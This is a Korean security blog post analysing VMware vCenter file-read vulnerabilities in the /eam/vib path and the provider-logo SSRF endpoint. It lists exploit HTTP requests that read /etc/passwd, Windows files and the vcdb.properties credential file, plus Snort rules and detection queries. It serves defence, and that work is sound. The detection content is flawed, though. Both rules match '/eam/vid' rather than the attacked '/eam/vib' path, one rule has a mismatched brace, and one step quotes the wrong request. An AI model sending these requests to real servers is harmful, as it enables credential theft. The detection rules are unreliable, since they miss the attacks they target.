본문 바로가기
Information/보안이벤트 분석 과정 설명

VMware vCenter 파일 읽기 취약점 분석

by grey-hat hacker 2022. 10. 22.
728x90

목차

    vCenter Server?

    vCenter Server 는 VMware 용 중앙 집중식 관리 유틸리티이며 단일 중앙 위치에서 가상 머신 , 여러 ESXi 호스트 및 모든 종속 구성 요소 를 관리하는 데 사용됩니다 .

     

    VMware vCenter 파일 읽기 취약점 

     /eam/ 경로 취약점

    1. vCenter Server에 /eam/ 경로로 접근 

        ㄴ 404 응답값 확인 및 버전 정보 확인

    2. 해당 경로에서 username 및 password 정보 획득 가능.

    3. 아래 경로에서 정상적인 사용자로 로그인 접근 가능

    공격 로그

    GET /eam/vib?id=/etc/passwd HTTP/1.0
    GET /eam/vib?id=/etc/issue HTTP/1.1
    GET /eam/vib?id=c:\windows\win.ini HTTP/1.1
    GET /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties HTTP/1.1
    GET /eam/vib?id=C:\ProgramData\VMware\VMware VirtualCenter\vcdb.properties HTTP/1.1
    GET /eam/vib?id=C:\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\vcdb.properties HTTP/1.1

    탐지 시그니처 및 공격 성공 탐지 쿼리

    탐지 snort Rule
    alert tcp any any -> any any (
    msg:"VMware-vCenter_eam_unauthorized_file_read";
    content:"/eam/vid"; http_uri;
    metadata:service http;
    )
    
    공격 성공 탐지 쿼리
    접근 content="*/eam/vid*"
    응답 (content="*404*" OR content="*root*" OR content="password" OR content="*200 OK*")

    /ui/vcav-bootstrap/rest/vcav-providers/provider-logo경로 취약점

     ㄴ VMware vCenter 이전 버전(7.0.2.00100)무단 임의 파일 읽기 + ssrf + xss 취약점이라고도 한다.

     

    1. https://{vCenterserver}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url={url}

      ㄴ 경로로 접근 했을 때 취약한 서버의 경우 500 error가 뜨고 ProvidersController.getProviderLogo 함수가 실행된다. 

    2. 접근하고 싶은 경로의 url 매개변수를 구성하여 구성 파일을 읽습니다.

    ㄴ GET /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties HTTP/1.1

        ㄴ 해당 경로를 통해 username, password 정보 획득 가능

    공격로그

    GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/shells HTTP/1.1
    GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file://C:\Windows\win.ini HTTP/1.1
    GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/profile HTTP/1.1
    GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https:// HTTP/1.1

    탐지 시그니처 및 공격 성공 탐지 쿼리

    탐지 snort Rule
    alert tcp any any -> any any (
    msg:"VMware-vCenter_7.0.2.00100_unauthorized_file_read";
    content:"/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"; http_uri;
    metadata:service http;
    }
    
    공격 성공 탐지 쿼리
    접근 content="*/ui/vcav-bootstrap/rest/vcav-providers/provider-logo*"
    응답 (content="*500*" OR content="*root*" OR content="password" OR content="*200 OK*")

     

    728x90
    반응형

    댓글